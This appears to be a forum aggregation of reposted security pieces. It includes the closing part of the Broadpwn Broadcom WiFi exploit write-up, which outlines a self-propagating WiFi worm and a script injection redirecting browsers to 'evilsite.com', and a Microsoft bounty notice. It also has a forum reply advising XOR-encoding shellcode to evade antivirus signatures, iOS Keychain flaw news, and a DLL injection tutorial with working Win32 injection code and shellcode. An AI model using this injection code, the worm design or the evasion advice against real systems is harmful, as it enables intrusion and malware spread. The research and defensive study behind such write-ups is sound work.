As we mentioned, there is still a problem with the above approach. For each firmware build, we’ll need to determine the correct memory addresses to be used in the exploit. And while those addresses are guaranteed to be consistent for a given build, we should still look for a way to avoid the hard work of compiling address tables for each firmware version.
The main problem is that we need a predictable memory address whose contents we control, so we can overwrite the pspoll_timer pointer and redirect it to our fake timer object. The previous approach relied on the fact that the address of wlc->pm is consistent for a given firmware build. But there’s another buffer whose address we already know: the ring buffer. And in this case, there’s an added advantage: its beginning address seems to be the same across the board for a specific chip type, regardless of build or version number. For the BCM4359, the ring buffer’s beginning address is 0x221ec0.

Therefore, if we ensure a packet we control will be written exactly to the beginning of the ring buffer, we can place our fake timer object there, and our payload immediately after it. Of course, making sure that our packet is put exactly at the beginning of the buffer is a serious challenge: we may be in an area with dozens of other APs and STAs, increasing the noise level and causing us to contend with many other packets.

In order to win the contest for the desired spot in the ring buffer, we have set up a dozen Alfa wireless adapters, each broadcasting on a different channel. By causing them to simultaneously bombard the air with packets on all channels, we have reached a situation where we successfully grab the first slot in the ring buffer about 70% of the time. Of course, this result could radically change if we move to a more crowded WiFi environment.

Once we grab the first slot, exploitation is simple: the fake timer object writes to the offset of p_restore_cpsr, overwriting it with the address of an offset within our packet in the first slot. This is where we will store our payload.

Despite the difficulty of this approach and the fact that it requires additional gear, it still offers a powerful alternative to the previous exploitation approach, in that the second approach does not require knowledge of addresses within the system.
THE NEXT STEP – PRIVILEGE ESCALATION

After achieving stable code execution on the Broadcom chip, an attacker’s natural goal would be to escape the chip and escalate their privileges to code execution on the application processor. There are three main approaches to this problem:

1. Find a bug in the Broadcom kernel driver that handles communication with the chip. The driver and chip communicate using a packet-based protocol, so an extensive attack surface on the kernel is exposed to the chip. This approach is difficult, since, unless a way to leak kernel memory is found, an attacker will not have enough knowledge about the kernel’s address space to carry out a successful exploit. Again, attacking the kernel is made more difficult by the fact that any mistake we make will crash the whole system, causing us to lose our foothold in the WiFi chip.

2. Use PCIe to read and write directly to kernel memory. While WiFi chips prior to the BCM4358 (the main WiFi chip used on the Samsung Galaxy S6) used Broadcom’s SDIO interface, more recent chips use PCIe, which inherently enables DMA to the application processor’s memory. The main drawback of this approach is that it will not support older phones.

3. Wait for the victim to browse to a non-HTTPS site, then, from the WiFi chip, redirect them to a malicious URL. The main advantage of this approach is that it supports all devices across the board. The drawback is that a separate exploit chain for the browser is required.

We believe that achieving kernel code execution from the chip is a sufficiently complicated subject to justify separate research; it is therefore out of the scope of the current research. However, work has already been done by Project Zero to show that a kernel write primitive can be achieved via PCIe [d]. In the current research, our approach is to use our foothold on the WiFi chip to redirect the user to an attacker-controlled site.
This task is made simple by the fact that a single firmware function, wlc_recv(), is the starting point for processing all packets. The signature of this function is as follows:

void wlc_recv(wlc_info *wlc, void *p);

The argument p is a pointer to HNDRTE’s implementation of an sk_buff. It holds a pointer to the packet data, as well as the packet’s length and a pointer to the next packet. We will need to hook the wlc_recv() function call, dump the contents of each packet that we receive, and look for packets that encapsulate unencrypted HTTP traffic. At this point, we will modify the packet to include a <script> tag with the code: “top.location.href = http://www.evilsite.com”.

THE FIRST WIFI WORM

The nature of the bug, which can be triggered without any need for authentication, and the stability of the exploit, which deterministically and reliably reaches code execution, lead us to the return of an old friend: the self-propagating malware, also known as the “worm”.

Worms died out around the end of the last decade, together with their essential companion, the remote exploit. They died out for the same reason: software mitigations became too mature, and automatic infection over the network became a distant memory. Until now.

Broadpwn is ideal for propagation over WLAN: it does not require authentication, doesn’t need an infoleak from the target device, and doesn’t require complicated logic to carry out. Using the information provided above, an attacker can turn a compromised device into a mobile infection station. We implemented our WiFi worm with the following steps:

1. In the previous section, we started running our own payload after restoring the system to a stable state and preventing a chip crash. The payload will hook wlc_recv(), in a similar manner to the one shown above.

2. The code in wlc_recv_hook will inspect each received packet and determine whether it is a Probe Request. Recall that wlc_recv() essentially behaves as if it runs in monitor mode: all packets received over the air are handled by it, and only tossed out later if they are not meant for the STA.

3. If the received packet is a Probe Request with the SSID of a specific AP, wlc_recv_hook will extract the SSID of the requested AP and start impersonating that AP by sending out a Probe Response to the STA.

4. In the next stage, wlc_recv() should receive an Authentication Open Sequence packet, and our hook function should send a response. This will be followed by an Association Request from the STA.

5. The next packet we will send is the Association Response containing the WMM IE which triggers the bug. Here, we’ll make use of the fact that we can crash the targeted chip several times without alerting the user, and start sending crafted packets adapted to exploit a specific firmware build. This will be repeated until we have brute forced the correct set of addresses. Alternatively, the second approach, which relies on spraying the ring buffer and placing the fake timer object and the payload at a deterministic location, can also be used.

Running an Alfa wireless adapter in monitor mode for about an hour in a crowded urban area, we sniffed hundreds of SSID names in Probe Request packets. Of these, approximately 70% were using a Broadcom WiFi chip [e]. Even assuming moderate infection rates, the impact of a Broadpwn worm running for several days is potentially huge.

Old school hackers often miss the “good old days” of the early 2000s, when remotely exploitable bugs were abundant, no mitigations were in place to stop them, and worms and malware ran rampant. But with new research opening previously unknown attack surface such as the BCM WiFi chip, those times may just be making a comeback.
References

[a] While KASLR is still largely unsupported on Android devices, the large variety of kernels out there effectively means that an attacker can make very few assumptions about an Android kernel’s address space. Another problem is that any misstep during an exploit will cause a kernel panic, crashing the device and drawing the attention of the victim.

[b] The BCM43xx family has been the subject of extensive security research in the past. Notable research includes Wardriving from Your Pocket (https://recon.cx/2013/slides/Recon2013-Omri%20Ildis%2C%20Yuval%20Ofir%20and%20Ruby%20Feinstein-Wardriving%20from%20your%20pocket.pdf) by Omri Ildis, Yuval Ofir and Ruby Feinstein; One Firmware to Monitor ’em All (http://archive.hack.lu/2012/Hacklu-2012-one-firmware-Andres-Blanco-Matias-Eissler.pdf) by Andres Blanco and Matias Eissler; and the Nexmon project by SEEMOO Lab (https://github.com/seemoo-lab/nexmon). These projects aimed mostly to implement monitor mode on Nexus phones by modifying the BCM firmware, and their insights greatly assisted the author with the current research. More recently, Gal Beniamini of Project Zero has published the first security-focused report about the BCM43xx family (https://googleprojectzero.blogspot.ca/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html), and has discovered several bugs in the BCM firmware.

[c] This function does not exist in the source code that we managed to obtain, so the naming is arbitrary.

[d] Gal Beniamini’s second blog post about BCM deals extensively with this issue (https://googleprojectzero.blogspot.co.il/2017/04/over-air-exploiting-broadcoms-wi-fi_11.html). And while a kernel read primitive is not demonstrated in that post, the nature of the MSGBUF protocol seems to make it possible.

[e] This is an estimate, and was determined by looking up the OUI part of the sniffed device’s MAC address.

Sursa: https://blog.exodusintel.com/2017/07/26/broadpwn/
Announcing the Windows Bounty Program
MSRC Team
July 26, 2017

Windows 10 represents the best and newest in our strong commitment to security, with world-class mitigations. One of Microsoft’s longstanding strategies toward improving software security involves investing in defensive technologies that make it difficult and costly for attackers to find, exploit and leverage vulnerabilities. We built in mitigations and defenses such as DEP, ASLR, CFG, CIG, ACG, Device Guard, and Credential Guard to harden our systems, and we continue adding defenses such as Windows Defender Application Guard to significantly increase protection and harden entry points while ensuring the customer experience is seamless.

In the spirit of maintaining a high security bar in Windows, we’re launching the Windows Bounty Program on July 26, 2017. This will include all features of the Windows Insider Preview, in addition to focus areas in Hyper-V, Mitigation bypass, Windows Defender Application Guard, and Microsoft Edge. We’re also bumping up the pay-out range for the Hyper-V Bounty Program.

Since 2012, we have launched multiple bounties for various Windows features. Security is always changing and we prioritize different types of vulnerabilities at different points in time. Microsoft strongly believes in the value of bug bounties, and we trust that they serve to enhance our security capabilities.
The overall program highlights:

- Any critical or important class remote code execution, elevation of privilege, or design flaw that compromises a customer’s privacy and security will receive a bounty
- The bounty program is sustained and will continue indefinitely at Microsoft’s discretion
- Bounty payouts will range from $500 USD to $250,000 USD
- If a researcher reports a qualifying vulnerability already found internally by Microsoft, a payment will be made to the first finder at a maximum of 10% of the highest amount they could’ve received (example: $1,500 for an RCE in Edge, $25,000 for an RCE in Hyper-V)
- All security bugs are important to us and we request you report all security bugs to secure@microsoft.com via the Coordinated Vulnerability Disclosure (CVD) policy
- For the latest information on new Windows features included in the Insider Previews, please visit the Windows 10 Insider Program Blog

The details of the targets and the focus areas can be found in the table below:

Category    | Targets                                  | Windows Version                                                                          | Payout range (USD)
------------|------------------------------------------|------------------------------------------------------------------------------------------|-------------------
Focus area  | Microsoft Hyper-V                        | Windows 10; Windows Server 2012; Windows Server 2012 R2; Windows Server Insider Preview  | $5,000 to $250,000
Focus area  | Mitigation bypass and Bounty for defense | Windows 10                                                                               | $500 to $200,000
Focus area  | Windows Defender Application Guard       | WIP slow                                                                                 | $500 to $30,000
Focus area  | Microsoft Edge                           | WIP slow                                                                                 | $500 to $15,000
Base        | Windows Insider Preview                  | WIP slow                                                                                 | $500 to $15,000

As always, the most up-to-date information about the Microsoft Bounty Programs can be found at https://aka.ms/BugBounty and in the associated terms and FAQs.

Akila Srinivasan, Joe Bialek, and Matt Miller from Microsoft Security Response Center
David Weston, Jason Silves from Windows and Devices Group Enterprise and Security
Arthur Wongtschowski, Mary Lee, Ron Aquino, and Riley Pittman from Windows and Devices Group Information Security

Sursa: https://blogs.technet.microsoft.com/msrc/2017/07/26/announcing-the-windows-bounty-program/
DLL Execution via Excel.Application RegisterXLL() method
Nytro replied to Nytro's topic in Exploituri
Yes, preferably at least XOR the shellcode so it isn’t detectable by static signatures.
iOS Vulnerability Exposes iPhone Users’ Passwords and Credit Cards
The security bug was discovered in the iCloud Keychain
Jul 25, 2017 09:34 GMT · By Bogdan Popa

Apple has silently patched a security vulnerability in iOS 10.3 that would have allowed hackers to access information in the iCloud Keychain, including users’ passwords and credit cards.

Security firm Longterm Security provides an in-depth look at the security bug, explaining that the vulnerability was discovered in the iCloud Keychain Sync’s custom Off-The-Record (OTR) system. iCloud Keychain is a feature that allows Apple users to have their private information synced across multiple devices, including but not limited to passwords and credit cards.

Longterm Security co-founder Alex Radocea explained that Apple’s system uses key verifications to transfer data from one device to another securely, but using a man-in-the-middle attack, hackers could have been able to bypass the process and intercept traffic sent by configured devices.

Data available to hackers in plain text

This means that data stored in the iCloud Keychain would have become available in plain text, without users even being aware of it, as no devices were being added and no notifications were sent. This means that passwords and credit cards were totally exposed to hackers should they have wanted to steal them.

While the flaw itself has already been patched by Apple in the latest iOS update, the security researcher warns that passwords need proper security, especially because this has become “critical in the real world.”

“There are opportunistic attackers and criminals looking to leverage and monetize leaked password dumps in any way they can think up. They represent an immediate and constant threat to iCloud as well as any other cloud service. Passwords alone would be fairly risky when storing a trove of user data including credit card numbers,” he posted.
Apple users are strongly recommended to update their devices as soon as possible, with iOS 10.3 currently available via Settings > General > Software Update on iPhones and iPads. It’s believed all the other iOS versions are vulnerable to attacks and are exposing users’ data, so updating is critical to keep data secure. Sursa: http://news.softpedia.com/news/ios-vulnerability-exposes-iphone-users-passwords-and-credit-cards-517156.shtml
Inject All the Things
JUL 16TH, 2017 7:49 PM

Well, it’s 2017 and I’m writing about DLL injection. It could be worse. DLL injection is a technique used by legitimate software to add/extend functionality to other programs, for debugging, or for reverse engineering. It is also commonly used by malware in a multitude of ways. This means that from a security perspective, it’s imperative to know how DLL injection works.

I wrote most of the code of this small project, called ‘injectAllTheThings’, a while ago when I started developing custom tools for Red Team engagements (in order to emulate different types of threat actors). If you want to see some examples of threat actors using DLL injection, have a look here. You may also find this project useful if you want to learn about DLL injection. The internet is full of crap when you look for this kind of information/code, and my code might not be better. I’m not a programmer, I just hack code when I need to.

Anyway, I’ve put together in a single Visual Studio project multiple DLL injection techniques (actually 7 different techniques) that work both for 32 and 64 bits, in a very easy way to read and understand. Some friends showed interest in the code, so it might interest you too. Every technique has its own source file to keep things simple. Below is the output of the tool, showing all the options and techniques implemented.

According to @SubTee, DLL injection is lame. I tend to agree; however, DLL injection goes way beyond simply loading a DLL. You can load DLLs with signed Microsoft binaries indeed, but you won’t attach to a certain process to mess with its memory. The reason why most Penetration Testers don’t actually know what DLL injection is, or how it works, is because Metasploit has spoiled them too much. They use it all the time, blindly. The best place to learn about this ‘weird’ memory manipulation stuff is actually game hacking forums, I believe.
If you are into Red Teaming you might have to get ‘dirty’ and play with this stuff too, unless you are happy to just run some random tools other people have written. Most of the time we start a Red Team exercise using highly sophisticated techniques, and if we stay undetected we start lowering the level of sophistication. That’s basically when we start dropping binaries on disk and playing with DLL injection. This post attempts to give an overview of DLL injection in a very simple and high-level way, and at the same time serves as “documentation” support for the project hosted at GitHub.

Introduction

DLL injection is basically the process of inserting/injecting code into a running process. The code we inject is in the form of a dynamic-link library (DLL). Why? DLLs are meant to be loaded as needed at run time (like shared libs in UNIX). In this project I’ll be using DLLs only; however, we actually can ‘inject’ code in many other forms (any PE file, shellcode/assembly, etc., as commonly seen in malware). Also, keep in mind that you need to have an appropriate level of privileges to start playing with other processes’ memory. However, I won’t be talking about protected processes and Windows privilege levels (introduced with Vista). That’s a completely different subject.

Again, as I said above, DLL injection can be used for legitimate purposes. For example, antivirus and endpoint security solutions use these techniques to place their own software code/hooks into “all” running processes on the system. This enables them to monitor each process while it’s running, and better protect us. There are also malicious purposes. A common technique often used was injecting into the ‘lsass’ process to obtain password hashes. We all have done that. Period. Obviously, malware also uses code injection techniques extensively, either to run shellcode, run PE files, or load DLLs into the memory of another process to hide itself, among others.
The Basics

We’ll be using the MS Windows API for every technique, since it offers a considerable number of functions that allow us to attach to and manipulate other processes. DLLs have been the cornerstone of MS Windows since the first version of the operating system. In fact, all the functions in the MS Windows API are contained in DLLs. Some of the most important are ‘Kernel32.dll’ (which contains functions for managing memory, processes, and threads), ‘User32.dll’ (mostly user-interface functions), and ‘GDI32.dll’ (functions for drawing graphics and text display).

You might be wondering why such APIs exist: why would Microsoft give us such a nice set of functions to play and mess with other processes’ memory? The main reason is to extend the features of an application. For example, a company creates an application and wants to allow other companies to extend or enhance the application. So yes, it has a legitimate usage purpose. Besides, DLLs are useful for project management, conserving memory, resource sharing, and so on.

The diagram below tries to illustrate the process flow of almost every DLL injection technique. As you can see above, I would say DLL injection happens in four steps:

1. Attach to the target/remote process
2. Allocate memory within the target/remote process
3. Copy the DLL path, or the DLL, into the target/remote process memory
4. Instruct the process to execute the DLL

All these steps are accomplished by calling a certain set of API functions. Each technique will require a certain setup and options to be set. I would say that each technique has its positives and negatives.

Techniques

We have multiple options to instruct a process to execute our DLL. The most common ones are maybe ‘CreateRemoteThread()’ and ‘NtCreateThreadEx()’. However, it’s not possible to just pass a DLL as a parameter to these functions. We have to provide a memory address that holds the execution starting point.
For that, we need to perform memory allocation, load our DLL with ‘LoadLibrary()’, copy memory, and so on. The project I called ‘injectAllTheThings’ (because I just hate the name ‘injector’, plus there are already too many crappy ‘injectors’ on GitHub, and I couldn’t think of anything else) includes 7 different techniques. I’m not the original author of any of the techniques. I just compiled, and cleaned, these seven techniques (yes, there are more). Some are well documented (like ‘CreateRemoteThread()’), others use undocumented APIs (like ‘NtCreateThreadEx()’). Here’s a complete list of the techniques implemented, all working for both 32 and 64 bits:

- CreateRemoteThread()
- NtCreateThreadEx()
- QueueUserAPC
- SetWindowsHookEx()
- RtlCreateUserThread()
- Code cave via SetThreadContext()
- Reflective DLL

You might know some of these techniques by other names. This isn’t a complete list of every DLL injection technique around. As I said, there are more; I might add them later if I have to play with them for a certain project. For now, this is the list of techniques I used in some projects. Some are stable, some aren’t. Maybe the unstable ones are because of my own code, you have been warned.

LoadLibrary()

As stated on MSDN, the ‘LoadLibrary()’ function “loads the specified module into the address space of the calling process. The specified module may cause other modules to be loaded”.

HMODULE WINAPI LoadLibrary(
  _In_ LPCTSTR lpFileName
);

lpFileName [in]
    The name of the module. This can be either a library module (a .dll file) or an
    executable module (an .exe file). (...)
    If the string specifies a full path, the function searches only that path for the
    module. If the string specifies a relative path or a module name without a path,
    the function uses a standard search strategy to find the module (...)
    If the function cannot find the module, the function fails. When specifying a path,
    be sure to use backslashes (\), not forward slashes (/). (...)
    If the string specifies a module name without a path and the file name extension is
    omitted, the function appends the default library extension .dll to the module
    name. (...)

In other words, it takes a filename as its only parameter and everything works. That is, we only need to allocate some memory for the path of our DLL and set our execution starting point to the address of the ‘LoadLibrary()’ function, passing the memory address of the path as a parameter.

As you may, or may not know, the big issue here is that ‘LoadLibrary()’ registers the loaded DLL with the program. Meaning it can be easily detected, but you might be surprised that many endpoint security solutions still fail at this. Anyway, as I said before, DLL injection has legitimate usage cases too, so… Also, note that if a DLL has already been loaded with ‘LoadLibrary()’, it will not be executed again. You might work around this, but I didn’t do it for any of the techniques.

With the Reflective DLL injection you don’t have this problem of course, because the DLL is not registered. The Reflective DLL injection technique, instead of using ‘LoadLibrary()’, loads the entire DLL into memory and then determines the offset to the DLL’s entry point in order to invoke it. Call it more stealthy if you want. Forensics guys will still be able to find your DLL in memory, but it won’t be that easy. Metasploit uses this massively; still, most endpoint solutions are happy with all this anyway. If you feel like hunting for this kind of stuff, or you are on the ‘blue’ side of the game, have a look here and here.

As a side note, if you are really struggling with your endpoint security software being fine with all this… you might want to try to use some gaming anti-cheating engine instead (note, I’m only trying to be funny in case you didn’t get it). The anti-rootkit capabilities of some anti-cheating engines are way more advanced than some AVs.
There’s a really cool interview with Nick Cano, author of the “Game Hacking” book, on reddit that you must read. Just check what he has been doing and you’ll understand what I’m talking about.

Attach to the target/remote process

For a start, we need a handle to the process we want to interact with. For this we use the ‘OpenProcess()’ API call.

HANDLE WINAPI OpenProcess(
  _In_ DWORD dwDesiredAccess,
  _In_ BOOL  bInheritHandle,
  _In_ DWORD dwProcessId
);

If you read the documentation on MSDN you’ll see that we need to request a certain set of access rights. A complete list of access rights can be found here. These might vary across MS Windows versions. The following is used across almost every technique.

HANDLE hProcess = OpenProcess(
    PROCESS_QUERY_INFORMATION |
    PROCESS_CREATE_THREAD |
    PROCESS_VM_OPERATION |
    PROCESS_VM_WRITE,
    FALSE,
    dwProcessId);

Allocate memory within the target/remote process

In order to allocate memory for the DLL path we use ‘VirtualAllocEx()’. As stated in MSDN, ‘VirtualAllocEx()’ “reserves, commits, or changes the state of a region of memory within the virtual address space of a specified process. The function initializes the memory it allocates to zero.”

LPVOID WINAPI VirtualAllocEx(
  _In_     HANDLE hProcess,
  _In_opt_ LPVOID lpAddress,
  _In_     SIZE_T dwSize,
  _In_     DWORD  flAllocationType,
  _In_     DWORD  flProtect
);

Basically, we’ll do something like this:

// calculate the number of bytes needed for the DLL's pathname
DWORD dwSize = (lstrlenW(pszLibFile) + 1) * sizeof(wchar_t);

// allocate space in the target/remote process for the pathname
LPVOID pszLibFileRemote = (PWSTR)VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);

Or you could be a bit smarter and use the ‘GetFullPathName()’ API call. However, I don’t use this API call in the project. Just a matter of preference, or not being smart.
If you want to allocate space for the full DLL, you'll have to do something like:

    hFile = CreateFileW(pszLibFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    dwSize = GetFileSize(hFile, NULL);
    PVOID pszLibFileRemote = (PWSTR)VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);

Copy the DLL Path, or the DLL, into the target/remote process' memory

Now it's just a matter of copying our DLL path, or the full DLL, into the target/remote process by using the 'WriteProcessMemory()' API call.

    BOOL WINAPI WriteProcessMemory(
        _In_  HANDLE  hProcess,
        _In_  LPVOID  lpBaseAddress,
        _In_  LPCVOID lpBuffer,
        _In_  SIZE_T  nSize,
        _Out_ SIZE_T  *lpNumberOfBytesWritten
    );

That is something like...

    DWORD n = WriteProcessMemory(hProcess, pszLibFileRemote, (PVOID)pszLibFile, dwSize, NULL);

If we want to copy the full DLL, like in the Reflective DLL injection technique, there's a bit more code, as we need to read the DLL into memory before we copy it into the target/remote process.

    lpBuffer = HeapAlloc(GetProcessHeap(), 0, dwLength);
    ReadFile(hFile, lpBuffer, dwLength, &dwBytesRead, NULL);
    WriteProcessMemory(hProcess, pszLibFileRemote, lpBuffer, dwLength, NULL);

As I mentioned before, by using the Reflective DLL injection technique and copying the DLL into memory, the DLL won't be registered with the process. It gets a bit complex because we need to obtain the entry point of the DLL once it is loaded in memory. The 'LoadRemoteLibraryR()' function, which is part of the Reflective DLL project, does it for us. Have a look at the source if you want. One thing to notice is that the DLL we'll be injecting needs to be compiled with the appropriate includes and options so it aligns itself with the Reflective DLL injection method. The 'injectAllTheThings' project includes a DLL called 'rdll_32.dll/rdll_64.dll' that you can use to play with.
Instruct the process to execute the DLL

CreateRemoteThread()

We can say that 'CreateRemoteThread()' is the classic and most popular DLL injection technique around. Also, the most well documented one. It consists of the steps below:

1. Open the target process with OpenProcess()
2. Find the address of LoadLibrary() by using GetProcAddress()
3. Reserve memory for the DLL path in the target/remote process address space by using VirtualAllocEx()
4. Write the DLL path into the previously reserved memory space with WriteProcessMemory()
5. Use CreateRemoteThread() to create a new thread, which will call the LoadLibrary() function with the DLL path name as parameter

If you look at the 'CreateRemoteThread()' documentation on MSDN, we can see that we need a "pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread and represents the starting address of the thread in the remote process." Which means that to execute our DLL we only need to instruct our process to do it. Simple. See below all the basic steps listed above.

    HANDLE hProcess = OpenProcess(
        PROCESS_QUERY_INFORMATION |
        PROCESS_CREATE_THREAD |
        PROCESS_VM_OPERATION |
        PROCESS_VM_WRITE,
        FALSE, dwProcessId);

    // Allocate space in the remote process for the pathname
    LPVOID pszLibFileRemote = (PWSTR)VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);

    // Copy the DLL's pathname to the remote process address space
    DWORD n = WriteProcessMemory(hProcess, pszLibFileRemote, (PVOID)pszLibFile, dwSize, NULL);

    // Get the real address of LoadLibraryW in Kernel32.dll
    PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");

    // Create a remote thread that calls LoadLibraryW(DLLPathname)
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn, pszLibFileRemote, 0, NULL);

For the complete source code see 't_CreateRemoteThread.cpp'.
NtCreateThreadEx()

Another option is to use 'NtCreateThreadEx()'. This is an undocumented 'ntdll.dll' function and it might disappear or change in the future. This technique is a bit more complex to implement, as we need a structure (see below) to pass to it and another to receive data from it.

    struct NtCreateThreadExBuffer {
        ULONG  Size;
        ULONG  Unknown1;
        ULONG  Unknown2;
        PULONG Unknown3;
        ULONG  Unknown4;
        ULONG  Unknown5;
        ULONG  Unknown6;
        PULONG Unknown7;
        ULONG  Unknown8;
    };

There's a good explanation about this call here. The setup is very close to what we do for 'CreateRemoteThread()'. However, instead of calling 'CreateRemoteThread()' we do something along these lines:

    PTHREAD_START_ROUTINE ntCreateThreadExAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("ntdll.dll")), "NtCreateThreadEx");
    LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx)ntCreateThreadExAddr;

    NTSTATUS status = funNtCreateThreadEx(
        &hRemoteThread,
        0x1FFFFF,
        NULL,
        hProcess,
        pfnThreadRtn,
        (LPVOID)pszLibFileRemote,
        FALSE,
        NULL,
        NULL,
        NULL,
        NULL
    );

For the complete source code see 't_NtCreateThreadEx.cpp'.

QueueUserAPC()

An alternative to the previous techniques that doesn't create a new thread in the target/remote process is the 'QueueUserAPC()' call. As documented on MSDN, this call "adds a user-mode asynchronous procedure call (APC) object to the APC queue of the specified thread." Here's the definition:

    DWORD WINAPI QueueUserAPC(
        _In_ PAPCFUNC  pfnAPC,
        _In_ HANDLE    hThread,
        _In_ ULONG_PTR dwData
    );

pfnAPC [in]
    A pointer to the application-supplied APC function to be called when the specified thread performs an alertable wait operation. (...)
hThread [in]
    A handle to the thread. The handle must have the THREAD_SET_CONTEXT access right. (...)
dwData [in]
    A single value that is passed to the APC function pointed to by the pfnAPC parameter.
So, if we don't want to create our own thread, we can use 'QueueUserAPC()' to "hijack" an existing thread in the target/remote process. That is, calling this function will queue an asynchronous procedure call on the specified thread. We can use a real APC callback function instead of 'LoadLibrary()'. The parameter can actually be a pointer to the filename of the DLL we want to inject.

    DWORD dwResult = QueueUserAPC((PAPCFUNC)pfnThreadRtn, hThread, (ULONG_PTR)pszLibFileRemote);

There's a little gotcha that you might notice if you try this technique, which is related to the way MS Windows executes APCs. There's no scheduler looking at the APC queue, meaning the queue is only examined when the thread becomes alertable. Because of this we basically hijack every single thread, see below.

    BOOL bResult = Thread32First(hSnapshot, &threadEntry);
    while (bResult) {
        bResult = Thread32Next(hSnapshot, &threadEntry);
        if (bResult) {
            if (threadEntry.th32OwnerProcessID == dwProcessId) {
                threadId = threadEntry.th32ThreadID;
                wprintf(TEXT("[+] Using thread: %i\n"), threadId);
                HANDLE hThread = OpenThread(THREAD_SET_CONTEXT, FALSE, threadId);
                if (hThread == NULL)
                    wprintf(TEXT("[-] Error: Can't open thread. Continuing to try other threads...\n"));
                else {
                    DWORD dwResult = QueueUserAPC((PAPCFUNC)pfnThreadRtn, hThread, (ULONG_PTR)pszLibFileRemote);
                    if (!dwResult)
                        wprintf(TEXT("[-] Error: Couldn't call QueueUserAPC on thread. Continuing to try other threads...\n"));
                    else
                        wprintf(TEXT("[+] Success: DLL injected via QueueUserAPC().\n"));
                    CloseHandle(hThread);
                }
            }
        }
    }

We basically do this expecting one thread to become alertable. As a side note, it was nice to see this technique being used by DOUBLEPULSAR.

For the complete source code see 't_QueueUserAPC.cpp'.

SetWindowsHookEx()

In order to use this technique, the first thing we need to understand is how MS Windows hooks work.
Basically, hooks are a way to intercept events and act on them. As you may guess, there are many different types of hooks; the most common ones might be WH_KEYBOARD and WH_MOUSE. You guessed right, these can be used to monitor the keyboard and the mouse input. 'SetWindowsHookEx()' "installs an application-defined hook procedure into a hook chain."

    HHOOK WINAPI SetWindowsHookEx(
        _In_ int       idHook,
        _In_ HOOKPROC  lpfn,
        _In_ HINSTANCE hMod,
        _In_ DWORD     dwThreadId
    );

idHook [in]
    The type of hook procedure to be installed. (...)
lpfn [in]
    A pointer to the hook procedure. (...)
hMod [in]
    A handle to the DLL containing the hook procedure pointed to by the lpfn parameter. (...)
dwThreadId [in]
    The identifier of the thread with which the hook procedure is to be associated. (...)

An interesting remark on MSDN states that: "SetWindowsHookEx can be used to inject a DLL into another process. A 32-bit DLL cannot be injected into a 64-bit process, and a 64-bit DLL cannot be injected into a 32-bit process. If an application requires the use of hooks in other processes, it is required that a 32-bit application call SetWindowsHookEx to inject a 32-bit DLL into 32-bit processes, and a 64-bit application call SetWindowsHookEx to inject a 64-bit DLL into 64-bit processes. The 32-bit and 64-bit DLLs must have different names." Keep this in mind.

Here's a simple extract of the implementation:

    GetWindowThreadProcessId(targetWnd, &dwProcessId);
    HHOOK handle = SetWindowsHookEx(WH_KEYBOARD, addr, dll, threadID);

We need to understand that every event that occurs will go through a hook chain, which is a series of procedures that run on the event. The call to 'SetWindowsHookEx()' is basically how we put our own hook procedure into the hook chain.
The code above takes the type of hook to be installed (WH_KEYBOARD), the pointer to the procedure, the handle to the DLL containing the procedure, and the thread id to associate the hook with. In order to get the pointer to the procedure, we first need to load the DLL using the 'LoadLibrary()' call. Then we call 'SetWindowsHookEx()' and wait for the event that we want (in our case a key press). Once that event happens, our DLL is executed.

Note that even the CIA guys are, potentially, having some fun with 'SetWindowsHookEx()', as we can see on WikiLeaks.

For the complete source code see 't_SetWindowsHookEx.cpp'.

RtlCreateUserThread()

'RtlCreateUserThread()' is an undocumented API call. Its setup is almost the same as for 'CreateRemoteThread()', and consequently for 'NtCreateThreadEx()'. In fact, 'RtlCreateUserThread()' calls 'NtCreateThreadEx()', which means 'RtlCreateUserThread()' is a small wrapper around 'NtCreateThreadEx()'. So, nothing new here. However, we might want to use 'RtlCreateUserThread()' instead of 'NtCreateThreadEx()': even if the latter changes, our 'RtlCreateUserThread()' code should still work. As you might know, among others, mimikatz and Metasploit both use 'RtlCreateUserThread()'. If you are curious, have a look here and here. So, if mimikatz and Metasploit are using 'RtlCreateUserThread()'... and yes, those guys know their stuff... follow their "advice" and use 'RtlCreateUserThread()', especially if you are planning to do something more serious than a simple 'injectAllTheThings' program.

For the complete source code see 't_RtlCreateUserThread.cpp'.

SetThreadContext()

This is actually a very cool method. Specially crafted code is injected into the target/remote process by allocating a chunk of memory there. This code is responsible for loading the DLL. Here's the code for 32 bits.
    0x68, 0xCC, 0xCC, 0xCC, 0xCC, // push 0xDEADBEEF (placeholder for return address)
    0x9c,                         // pushfd (save flags and registers)
    0x60,                         // pushad
    0x68, 0xCC, 0xCC, 0xCC, 0xCC, // push 0xDEADBEEF (placeholder for DLL path name)
    0xb8, 0xCC, 0xCC, 0xCC, 0xCC, // mov eax, 0xDEADBEEF (placeholder for LoadLibrary)
    0xff, 0xd0,                   // call eax (call LoadLibrary)
    0x61,                         // popad (restore flags and registers)
    0x9d,                         // popfd
    0xc3                          // ret

For 64 bits I couldn't actually find any working assembly code, so I kind of wrote my own. See below.

    0x50,                                                       // push rax (save rax)
    0x48, 0xB8, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // mov rax, 0CCCCCCCCCCCCCCCCh (placeholder for return address)
    0x9c,                                                       // pushfq
    0x51,                                                       // push rcx
    0x52,                                                       // push rdx
    0x53,                                                       // push rbx
    0x55,                                                       // push rbp
    0x56,                                                       // push rsi
    0x57,                                                       // push rdi
    0x41, 0x50,                                                 // push r8
    0x41, 0x51,                                                 // push r9
    0x41, 0x52,                                                 // push r10
    0x41, 0x53,                                                 // push r11
    0x41, 0x54,                                                 // push r12
    0x41, 0x55,                                                 // push r13
    0x41, 0x56,                                                 // push r14
    0x41, 0x57,                                                 // push r15
